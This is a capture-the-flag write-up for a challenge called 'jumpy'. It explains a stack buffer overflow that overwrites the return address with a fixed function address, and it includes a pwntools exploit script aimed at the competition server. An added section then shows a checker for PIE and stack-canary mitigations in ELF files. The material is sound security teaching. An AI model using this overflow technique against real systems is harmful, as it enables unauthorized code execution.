This challenge had two parts: the first was overflowing the buffer of size, and the second was overwriting the return address with the address of winrar. Since there was no ASLR and we are given the binary, the address can be hard-coded.
The amount of filler needed to reach the return address on the stack was 24, so we sent 24 A's followed by the return address.
```python
from pwn import *
import time

context(arch='amd64', os='linux')
context.log_level = 'debug'  # log all traffic while testing

binary = ELF('jumpy')

competition = True
if competition:
    conn = remote("wcscctf.org", 8484)
else:
    conn = remote('localhost', 1234)


def getInput():
    # read the banner/prompt line the service prints first
    print(conn.recvline())


def sendPayload():
    # no ASLR, so the address of winrar is fixed
    winAddress = p64(0x400636)
    filler = b'a' * 24
    payload = filler + winAddress
    # test the payload in gdb to see if it overwrote registers
    with open('payload', 'wb') as f:
        f.write(payload)
    conn.sendline(payload)
    time.sleep(1)
    print(conn.recvline() + conn.recvline())


if __name__ == "__main__":
    getInput()
    sendPayload()
```
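The hard-coded address only works because the binary loads at a fixed address and nothing checks the stack before the function returns. The following is an added example, not part of the original write-up: a small check for those two mitigations in a 64-bit ELF file. The function names, the sample headers and the entry-point values are constructed for illustration.

```python
import struct

ET_EXEC, ET_DYN = 2, 3  # e_type values from the ELF specification


def elf_hardening(data):
    """Report the mitigations that would break a hard-coded return address."""
    if len(data) < 64 or data[:4] != b"\x7fELF":
        raise ValueError("not a complete ELF header")
    if data[4] != 2 or data[5] != 1:
        raise ValueError("only 64-bit little-endian ELF is handled here")
    (e_type,) = struct.unpack_from("<H", data, 16)
    (e_entry,) = struct.unpack_from("<Q", data, 24)
    return {
        # ET_DYN: position independent, so code addresses move under ASLR.
        # ET_EXEC: fixed load address, so function addresses are constant.
        "pie": e_type == ET_DYN,
        "entry": e_entry,
        # Heuristic: binaries built with -fstack-protector import this symbol.
        "canary": b"__stack_chk_fail" in data,
    }


def make_header(e_type, entry):
    """Build a constructed 64-byte ELF64 header for the demo (no segments)."""
    ident = b"\x7fELF" + bytes([2, 1, 1, 0]) + bytes(8)
    rest = struct.pack("<HHIQQQIHHHHHH",
                       e_type, 62, 1,      # type, EM_X86_64, version
                       entry, 64, 0, 0,    # entry, phoff, shoff, flags
                       64, 56, 0, 64, 0, 0)
    return ident + rest


# Constructed samples: a fixed-address build and a hardened build.
FIXED = make_header(ET_EXEC, 0x400500)
HARDENED = make_header(ET_DYN, 0x1060) + b"\x00__stack_chk_fail\x00"

if __name__ == "__main__":
    for name, blob in (("fixed", FIXED), ("hardened", HARDENED)):
        print(name, elf_hardening(blob))
```

To check a real file, pass `open(path, "rb").read()` to `elf_hardening`; a result of `pie: False` and `canary: False` matches the conditions this challenge relied on.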